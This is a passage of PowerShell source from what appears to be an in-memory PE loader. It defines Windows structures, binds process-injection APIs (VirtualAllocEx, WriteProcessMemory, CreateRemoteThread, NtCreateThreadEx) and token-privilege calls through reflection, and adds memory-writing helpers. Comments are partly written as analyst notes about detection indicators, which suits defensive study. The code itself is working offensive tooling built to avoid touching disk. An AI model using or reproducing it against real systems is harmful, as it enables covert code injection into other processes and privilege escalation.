        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
        $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR


        # IMAGE_EXPORT_DIRECTORY (40 bytes). All Address* fields are RVAs into the image.
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
        $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
        $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
        $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY


        # Token-privilege types (LUID, LUID_AND_ATTRIBUTES, TOKEN_PRIVILEGES) for the
        # AdjustTokenPrivileges-style calls elsewhere in the loader. TOKEN_PRIVILEGES is
        # sized for exactly one LUID_AND_ATTRIBUTES entry (4 + 12 = 16 bytes).
        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
        $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
        $LUID = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID


        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
        $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
        $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
        $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES


        $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
        $TypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType], 16)
        $TypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null
        $TypeBuilder.DefineField('Privileges', $LUID_AND_ATTRIBUTES, 'Public') | Out-Null
        $TOKEN_PRIVILEGES = $TypeBuilder.CreateType()
        $Win32Types | Add-Member -MemberType NoteProperty -Name TOKEN_PRIVILEGES -Value $TOKEN_PRIVILEGES

        return $Win32Types
    }
  388.  
  389.     Function Get-Win32Constants
  390.     {
  391.         $Win32Constants = New-Object System.Object
  392.  
  393.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
  394.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
  395.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOACCESS -Value 0x01
  396.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READONLY -Value 0x02
  397.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_READWRITE -Value 0x04
  398.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_WRITECOPY -Value 0x08
  399.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE -Value 0x10
  400.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READ -Value 0x20
  401.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_READWRITE -Value 0x40
  402.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_EXECUTE_WRITECOPY -Value 0x80
  403.         $Win32Constants | Add-Member -MemberType NoteProperty -Name PAGE_NOCACHE -Value 0x200
  404.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_ABSOLUTE -Value 0
  405.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_HIGHLOW -Value 3
  406.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_REL_BASED_DIR64 -Value 10
  407.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_DISCARDABLE -Value 0x02000000
  408.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_EXECUTE -Value 0x20000000
  409.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_READ -Value 0x40000000
  410.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_WRITE -Value 0x80000000
  411.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_SCN_MEM_NOT_CACHED -Value 0x04000000
  412.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_DECOMMIT -Value 0x4000
  413.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_EXECUTABLE_IMAGE -Value 0x0002
  414.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_DLL -Value 0x2000
  415.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE -Value 0x40
  416.         $Win32Constants | Add-Member -MemberType NoteProperty -Name IMAGE_DLLCHARACTERISTICS_NX_COMPAT -Value 0x100
  417.         $Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RELEASE -Value 0x8000
  418.         $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_QUERY -Value 0x0008
  419.         $Win32Constants | Add-Member -MemberType NoteProperty -Name TOKEN_ADJUST_PRIVILEGES -Value 0x0020
  420.         $Win32Constants | Add-Member -MemberType NoteProperty -Name SE_PRIVILEGE_ENABLED -Value 0x2
  421.         $Win32Constants | Add-Member -MemberType NoteProperty -Name ERROR_NO_TOKEN -Value 0x3f0
  422.  
  423.         return $Win32Constants
  424.     }
  425.  
    # Resolves the native APIs the loader uses and exposes each one as an invokable
    # delegate on a PSObject (e.g. $Win32Functions.VirtualAllocEx.Invoke(...)).
    # Resolution is fully dynamic: Get-ProcAddress locates the export, Get-DelegateType
    # emits a matching delegate type in memory, and GetDelegateForFunctionPointer binds
    # the two. No Add-Type / DllImport declaration is compiled, so nothing touches disk.
    #
    # Analyst note: the API set assembled here (OpenProcess, VirtualAllocEx,
    # WriteProcessMemory, CreateRemoteThread / NtCreateThreadEx, AdjustTokenPrivileges,
    # LookupPrivilegeValue) is the process-injection and privilege-adjustment surface of
    # the script; script block logging of this body is a stable indicator regardless of
    # how the outer function is renamed.
    #
    # Get-ProcAddress only uses GetModuleHandle (no LoadLibrary), so every module named
    # below must already be loaded in the host process; otherwise the address is zero
    # and the resulting delegate is unusable.
    # Returns: PSObject with one NoteProperty per delegate.
    Function Get-Win32Functions
    {
        $Win32Functions = New-Object System.Object

        # Add-Member's first positional parameter is -MemberType, so the two spellings
        # used in this function ("Add-Member NoteProperty" and "-MemberType NoteProperty")
        # are equivalent.
        $VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
        $VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
        $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocAddr, $VirtualAllocDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualAlloc -Value $VirtualAlloc

        $VirtualAllocExAddr = Get-ProcAddress kernel32.dll VirtualAllocEx
        $VirtualAllocExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
        $VirtualAllocEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualAllocExAddr, $VirtualAllocExDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualAllocEx -Value $VirtualAllocEx

        # CRT memcpy/memset from msvcrt.dll. memset's size parameter is declared [IntPtr]
        # while memcpy's is [UIntPtr]; both are pointer-sized, so the marshaling is the same.
        $memcpyAddr = Get-ProcAddress msvcrt.dll memcpy
        $memcpyDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr]) ([IntPtr])
        $memcpy = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memcpyAddr, $memcpyDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name memcpy -Value $memcpy

        $memsetAddr = Get-ProcAddress msvcrt.dll memset
        $memsetDelegate = Get-DelegateType @([IntPtr], [Int32], [IntPtr]) ([IntPtr])
        $memset = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($memsetAddr, $memsetDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name memset -Value $memset

        # ANSI variants (LoadLibraryA / GetModuleHandleA / LookupPrivilegeValueA) are
        # bound, matching the [String] parameter types of the delegates.
        $LoadLibraryAddr = Get-ProcAddress kernel32.dll LoadLibraryA
        $LoadLibraryDelegate = Get-DelegateType @([String]) ([IntPtr])
        $LoadLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryAddr, $LoadLibraryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name LoadLibrary -Value $LoadLibrary

        $GetProcAddressAddr = Get-ProcAddress kernel32.dll GetProcAddress
        $GetProcAddressDelegate = Get-DelegateType @([IntPtr], [String]) ([IntPtr])
        $GetProcAddress = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressAddr, $GetProcAddressDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddress -Value $GetProcAddress

        # Second binding of the same export whose name argument is an [IntPtr] instead of
        # a [String]; presumably for lookups where the name/ordinal is already a pointer.
        $GetProcAddressIntPtrAddr = Get-ProcAddress kernel32.dll GetProcAddress
        $GetProcAddressIntPtrDelegate = Get-DelegateType @([IntPtr], [IntPtr]) ([IntPtr])
        $GetProcAddressIntPtr = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetProcAddressIntPtrAddr, $GetProcAddressIntPtrDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetProcAddressIntPtr -Value $GetProcAddressIntPtr

        $VirtualFreeAddr = Get-ProcAddress kernel32.dll VirtualFree
        $VirtualFreeDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32]) ([Bool])
        $VirtualFree = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeAddr, $VirtualFreeDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualFree -Value $VirtualFree

        $VirtualFreeExAddr = Get-ProcAddress kernel32.dll VirtualFreeEx
        $VirtualFreeExDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [UInt32]) ([Bool])
        $VirtualFreeEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualFreeExAddr, $VirtualFreeExDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualFreeEx -Value $VirtualFreeEx

        # Last parameter is the lpflOldProtect out-parameter, hence MakeByRefType().
        $VirtualProtectAddr = Get-ProcAddress kernel32.dll VirtualProtect
        $VirtualProtectDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32].MakeByRefType()) ([Bool])
        $VirtualProtect = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectAddr, $VirtualProtectDelegate)
        $Win32Functions | Add-Member NoteProperty -Name VirtualProtect -Value $VirtualProtect

        $GetModuleHandleAddr = Get-ProcAddress kernel32.dll GetModuleHandleA
        $GetModuleHandleDelegate = Get-DelegateType @([String]) ([IntPtr])
        $GetModuleHandle = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetModuleHandleAddr, $GetModuleHandleDelegate)
        $Win32Functions | Add-Member NoteProperty -Name GetModuleHandle -Value $GetModuleHandle

        $FreeLibraryAddr = Get-ProcAddress kernel32.dll FreeLibrary
        $FreeLibraryDelegate = Get-DelegateType @([IntPtr]) ([Bool])
        $FreeLibrary = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($FreeLibraryAddr, $FreeLibraryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name FreeLibrary -Value $FreeLibrary

        # Cross-process primitives start here: OpenProcess, WriteProcessMemory,
        # ReadProcessMemory and CreateRemoteThread are the calls that touch another
        # process and are the ones endpoint telemetry keys on.
        $OpenProcessAddr = Get-ProcAddress kernel32.dll OpenProcess
        $OpenProcessDelegate = Get-DelegateType @([UInt32], [Bool], [UInt32]) ([IntPtr])
        $OpenProcess = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenProcessAddr, $OpenProcessDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenProcess -Value $OpenProcess

        $WaitForSingleObjectAddr = Get-ProcAddress kernel32.dll WaitForSingleObject
        $WaitForSingleObjectDelegate = Get-DelegateType @([IntPtr], [UInt32]) ([UInt32])
        $WaitForSingleObject = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WaitForSingleObjectAddr, $WaitForSingleObjectDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name WaitForSingleObject -Value $WaitForSingleObject

        $WriteProcessMemoryAddr = Get-ProcAddress kernel32.dll WriteProcessMemory
        $WriteProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
        $WriteProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WriteProcessMemoryAddr, $WriteProcessMemoryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name WriteProcessMemory -Value $WriteProcessMemory

        $ReadProcessMemoryAddr = Get-ProcAddress kernel32.dll ReadProcessMemory
        $ReadProcessMemoryDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [UIntPtr], [UIntPtr].MakeByRefType()) ([Bool])
        $ReadProcessMemory = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReadProcessMemoryAddr, $ReadProcessMemoryDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name ReadProcessMemory -Value $ReadProcessMemory

        $CreateRemoteThreadAddr = Get-ProcAddress kernel32.dll CreateRemoteThread
        $CreateRemoteThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [UIntPtr], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr])
        $CreateRemoteThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateRemoteThreadAddr, $CreateRemoteThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateRemoteThread -Value $CreateRemoteThread

        $GetExitCodeThreadAddr = Get-ProcAddress kernel32.dll GetExitCodeThread
        $GetExitCodeThreadDelegate = Get-DelegateType @([IntPtr], [Int32].MakeByRefType()) ([Bool])
        $GetExitCodeThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetExitCodeThreadAddr, $GetExitCodeThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetExitCodeThread -Value $GetExitCodeThread

        # Token / privilege APIs used by Enable-SeDebugPrivilege.
        $OpenThreadTokenAddr = Get-ProcAddress Advapi32.dll OpenThreadToken
        $OpenThreadTokenDelegate = Get-DelegateType @([IntPtr], [UInt32], [Bool], [IntPtr].MakeByRefType()) ([Bool])
        $OpenThreadToken = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OpenThreadTokenAddr, $OpenThreadTokenDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name OpenThreadToken -Value $OpenThreadToken

        $GetCurrentThreadAddr = Get-ProcAddress kernel32.dll GetCurrentThread
        $GetCurrentThreadDelegate = Get-DelegateType @() ([IntPtr])
        $GetCurrentThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GetCurrentThreadAddr, $GetCurrentThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name GetCurrentThread -Value $GetCurrentThread

        $AdjustTokenPrivilegesAddr = Get-ProcAddress Advapi32.dll AdjustTokenPrivileges
        $AdjustTokenPrivilegesDelegate = Get-DelegateType @([IntPtr], [Bool], [IntPtr], [UInt32], [IntPtr], [IntPtr]) ([Bool])
        $AdjustTokenPrivileges = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($AdjustTokenPrivilegesAddr, $AdjustTokenPrivilegesDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name AdjustTokenPrivileges -Value $AdjustTokenPrivileges

        $LookupPrivilegeValueAddr = Get-ProcAddress Advapi32.dll LookupPrivilegeValueA
        $LookupPrivilegeValueDelegate = Get-DelegateType @([String], [String], [IntPtr]) ([Bool])
        $LookupPrivilegeValue = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LookupPrivilegeValueAddr, $LookupPrivilegeValueDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name LookupPrivilegeValue -Value $LookupPrivilegeValue

        $ImpersonateSelfAddr = Get-ProcAddress Advapi32.dll ImpersonateSelf
        $ImpersonateSelfDelegate = Get-DelegateType @([Int32]) ([Bool])
        $ImpersonateSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ImpersonateSelfAddr, $ImpersonateSelfDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name ImpersonateSelf -Value $ImpersonateSelf


        # NtCreateThreadEx is bound only when 6.0 <= OSVersion < 6.2 (Vista / Server 2008 /
        # Windows 7). Create-RemoteThread applies the same version test before using the
        # property; the two conditions must stay in sync, because reading an undefined
        # property is an error under Set-StrictMode.
        # NOTE(review): without a compatibility manifest .NET reports 6.2 on Windows 8.1
        # and later, so this branch is skipped there — confirm that is the intent.
        if (([Environment]::OSVersion.Version -ge (New-Object 'Version' 6,0)) -and ([Environment]::OSVersion.Version -lt (New-Object 'Version' 6,2))) {
            $NtCreateThreadExAddr = Get-ProcAddress NtDll.dll NtCreateThreadEx
            $NtCreateThreadExDelegate = Get-DelegateType @([IntPtr].MakeByRefType(), [UInt32], [IntPtr], [IntPtr], [IntPtr], [IntPtr], [Bool], [UInt32], [UInt32], [UInt32], [IntPtr]) ([UInt32])
            $NtCreateThreadEx = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NtCreateThreadExAddr, $NtCreateThreadExDelegate)
            $Win32Functions | Add-Member -MemberType NoteProperty -Name NtCreateThreadEx -Value $NtCreateThreadEx
        }

        # Module name case differs ("Kernel32.dll" vs "kernel32.dll" above); GetModuleHandle
        # is case-insensitive, so both resolve the same module.
        $IsWow64ProcessAddr = Get-ProcAddress Kernel32.dll IsWow64Process
        $IsWow64ProcessDelegate = Get-DelegateType @([IntPtr], [Bool].MakeByRefType()) ([Bool])
        $IsWow64Process = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($IsWow64ProcessAddr, $IsWow64ProcessDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name IsWow64Process -Value $IsWow64Process

        $CreateThreadAddr = Get-ProcAddress Kernel32.dll CreateThread
        $CreateThreadDelegate = Get-DelegateType @([IntPtr], [IntPtr], [IntPtr], [IntPtr], [UInt32], [UInt32].MakeByRefType()) ([IntPtr])
        $CreateThread = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($CreateThreadAddr, $CreateThreadDelegate)
        $Win32Functions | Add-Member -MemberType NoteProperty -Name CreateThread -Value $CreateThread

        return $Win32Functions
    }
  565.  
  566.  
  567.  
  568.  
  569.  
  570.  
  571.  
  572.  
  573.  
  574.     Function Sub-SignedIntAsUnsigned
  575.     {
  576.         Param(
  577.         [Parameter(Position = 0, Mandatory = $true)]
  578.         [Int64]
  579.         $Value1,
  580.  
  581.         [Parameter(Position = 1, Mandatory = $true)]
  582.         [Int64]
  583.         $Value2
  584.         )
  585.  
  586.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  587.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  588.         [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
  589.  
  590.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  591.         {
  592.             $CarryOver = 0
  593.             for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
  594.             {
  595.                 $Val = $Value1Bytes[$i] - $CarryOver
  596.  
  597.                 if ($Val -lt $Value2Bytes[$i])
  598.                 {
  599.                     $Val += 256
  600.                     $CarryOver = 1
  601.                 }
  602.                 else
  603.                 {
  604.                     $CarryOver = 0
  605.                 }
  606.  
  607.  
  608.                 [UInt16]$Sum = $Val - $Value2Bytes[$i]
  609.  
  610.                 $FinalBytes[$i] = $Sum -band 0x00FF
  611.             }
  612.         }
  613.         else
  614.         {
  615.             Throw "Cannot subtract bytearrays of different sizes"
  616.         }
  617.  
  618.         return [BitConverter]::ToInt64($FinalBytes, 0)
  619.     }
  620.  
  621.  
  622.     Function Add-SignedIntAsUnsigned
  623.     {
  624.         Param(
  625.         [Parameter(Position = 0, Mandatory = $true)]
  626.         [Int64]
  627.         $Value1,
  628.  
  629.         [Parameter(Position = 1, Mandatory = $true)]
  630.         [Int64]
  631.         $Value2
  632.         )
  633.  
  634.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  635.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  636.         [Byte[]]$FinalBytes = [BitConverter]::GetBytes([UInt64]0)
  637.  
  638.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  639.         {
  640.             $CarryOver = 0
  641.             for ($i = 0; $i -lt $Value1Bytes.Count; $i++)
  642.             {
  643.  
  644.                 [UInt16]$Sum = $Value1Bytes[$i] + $Value2Bytes[$i] + $CarryOver
  645.  
  646.                 $FinalBytes[$i] = $Sum -band 0x00FF
  647.  
  648.                 if (($Sum -band 0xFF00) -eq 0x100)
  649.                 {
  650.                     $CarryOver = 1
  651.                 }
  652.                 else
  653.                 {
  654.                     $CarryOver = 0
  655.                 }
  656.             }
  657.         }
  658.         else
  659.         {
  660.             Throw "Cannot add bytearrays of different sizes"
  661.         }
  662.  
  663.         return [BitConverter]::ToInt64($FinalBytes, 0)
  664.     }
  665.  
  666.  
  667.     Function Compare-Val1GreaterThanVal2AsUInt
  668.     {
  669.         Param(
  670.         [Parameter(Position = 0, Mandatory = $true)]
  671.         [Int64]
  672.         $Value1,
  673.  
  674.         [Parameter(Position = 1, Mandatory = $true)]
  675.         [Int64]
  676.         $Value2
  677.         )
  678.  
  679.         [Byte[]]$Value1Bytes = [BitConverter]::GetBytes($Value1)
  680.         [Byte[]]$Value2Bytes = [BitConverter]::GetBytes($Value2)
  681.  
  682.         if ($Value1Bytes.Count -eq $Value2Bytes.Count)
  683.         {
  684.             for ($i = $Value1Bytes.Count-1; $i -ge 0; $i--)
  685.             {
  686.                 if ($Value1Bytes[$i] -gt $Value2Bytes[$i])
  687.                 {
  688.                     return $true
  689.                 }
  690.                 elseif ($Value1Bytes[$i] -lt $Value2Bytes[$i])
  691.                 {
  692.                     return $false
  693.                 }
  694.             }
  695.         }
  696.         else
  697.         {
  698.             Throw "Cannot compare byte arrays of different size"
  699.         }
  700.  
  701.         return $false
  702.     }
  703.  
  704.  
  705.     Function Convert-UIntToInt
  706.     {
  707.         Param(
  708.         [Parameter(Position = 0, Mandatory = $true)]
  709.         [UInt64]
  710.         $Value
  711.         )
  712.  
  713.         [Byte[]]$ValueBytes = [BitConverter]::GetBytes($Value)
  714.         return ([BitConverter]::ToInt64($ValueBytes, 0))
  715.     }
  716.  
  717.  
  718.     Function Get-Hex
  719.     {
  720.         Param(
  721.         [Parameter(Position = 0, Mandatory = $true)]
  722.         $Value
  723.         )
  724.  
  725.         $ValueSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Value.GetType()) * 2
  726.         $Hex = "0x{0:X$($ValueSize)}" -f [Int64]$Value
  727.  
  728.         return $Hex
  729.     }
  730.  
  731.  
  732.     Function Test-MemoryRangeValid
  733.     {
  734.         Param(
  735.         [Parameter(Position = 0, Mandatory = $true)]
  736.         [String]
  737.         $DebugString,
  738.  
  739.         [Parameter(Position = 1, Mandatory = $true)]
  740.         [System.Object]
  741.         $PEInfo,
  742.  
  743.         [Parameter(Position = 2, Mandatory = $true)]
  744.         [IntPtr]
  745.         $StartAddress,
  746.  
  747.         [Parameter(ParameterSetName = "Size", Position = 3, Mandatory = $true)]
  748.         [IntPtr]
  749.         $Size
  750.         )
  751.  
  752.         [IntPtr]$FinalEndAddress = [IntPtr](Add-SignedIntAsUnsigned ($StartAddress) ($Size))
  753.  
  754.         $PEEndAddress = $PEInfo.EndAddress
  755.  
  756.         if ((Compare-Val1GreaterThanVal2AsUInt ($PEInfo.PEHandle) ($StartAddress)) -eq $true)
  757.         {
  758.             Throw "Trying to write to memory smaller than allocated address range. $DebugString"
  759.         }
  760.         if ((Compare-Val1GreaterThanVal2AsUInt ($FinalEndAddress) ($PEEndAddress)) -eq $true)
  761.         {
  762.             Throw "Trying to write to memory greater than allocated address range. $DebugString"
  763.         }
  764.     }
  765.  
  766.  
    # Copies $Bytes into memory of the current process starting at $MemoryAddress, one
    # byte at a time through Marshal.WriteByte. No bounds check is performed here; the
    # caller is responsible for validating the destination range first (the script
    # provides Test-MemoryRangeValid for that).
    # Arguments: $Bytes         - data to write; an empty array writes nothing
    #            $MemoryAddress - destination address
    # Returns:   nothing.
    Function Write-BytesToMemory
    {
        Param(
            [Parameter(Position=0, Mandatory = $true)]
            [Byte[]]
            $Bytes,

            [Parameter(Position=1, Mandatory = $true)]
            [IntPtr]
            $MemoryAddress
        )

        # WriteByte(base, offset, value): the offset form avoids pointer arithmetic here.
        for ($Offset = 0; $Offset -lt $Bytes.Length; $Offset++)
        {
            [System.Runtime.InteropServices.Marshal]::WriteByte($MemoryAddress, $Offset, $Bytes[$Offset])
        }
    }
  784.  
  785.  
  786.  
    # Emits, in memory, a delegate type with the given parameter and return types so a
    # raw function pointer can be wrapped by GetDelegateForFunctionPointer. This is the
    # Reflection.Emit substitute for declaring a delegate through Add-Type: no C#
    # compiler runs and no assembly is written to disk.
    # Arguments: $Parameters - ordered parameter types (default: none)
    #            $ReturnType - delegate return type (default: [Void])
    # Outputs:   the created [Type].
    # Analyst note: the literal names 'ReflectedDelegate', 'InMemoryModule' and
    # 'MyDelegateType' are fixed in this technique and are useful detection content;
    # every call creates a fresh dynamic assembly, so Get-Win32Functions produces one
    # per API it binds.
    Function Get-DelegateType
    {
        Param
        (
            # NOTE(review): placed inside Param(), this attribute appears to attach to the
            # $Parameters parameter rather than to the function; harmless, but it does not
            # act as a function-level [OutputType].
            [OutputType([Type])]

            [Parameter( Position = 0)]
            [Type[]]
            $Parameters = (New-Object Type[](0)),

            [Parameter( Position = 1 )]
            [Type]
            $ReturnType = [Void]
        )

        $Domain = [AppDomain]::CurrentDomain
        $DynAssembly = New-Object System.Reflection.AssemblyName('ReflectedDelegate')
        $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
        $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('InMemoryModule', $false)
        # A delegate is a sealed class deriving from MulticastDelegate whose constructor
        # and Invoke are provided by the runtime (hence 'Runtime, Managed' below).
        $TypeBuilder = $ModuleBuilder.DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate])
        $ConstructorBuilder = $TypeBuilder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $Parameters)
        $ConstructorBuilder.SetImplementationFlags('Runtime, Managed')
        $MethodBuilder = $TypeBuilder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $ReturnType, $Parameters)
        $MethodBuilder.SetImplementationFlags('Runtime, Managed')

        Write-Output $TypeBuilder.CreateType()
    }
  814.  
  815.  
  816.  
    # Returns the address of an exported procedure in an already-loaded module without
    # any P/Invoke declaration of its own: it reflects into the non-public
    # Microsoft.Win32.UnsafeNativeMethods class inside System.dll and calls its
    # GetModuleHandle / GetProcAddress wrappers.
    # Arguments: $Module    - module name as passed to GetModuleHandle (e.g. kernel32.dll)
    #            $Procedure - export name
    # Outputs:   [IntPtr] address, or IntPtr.Zero when the module is not loaded or the
    #            export does not exist. Nothing is checked here; callers must test the
    #            result themselves.
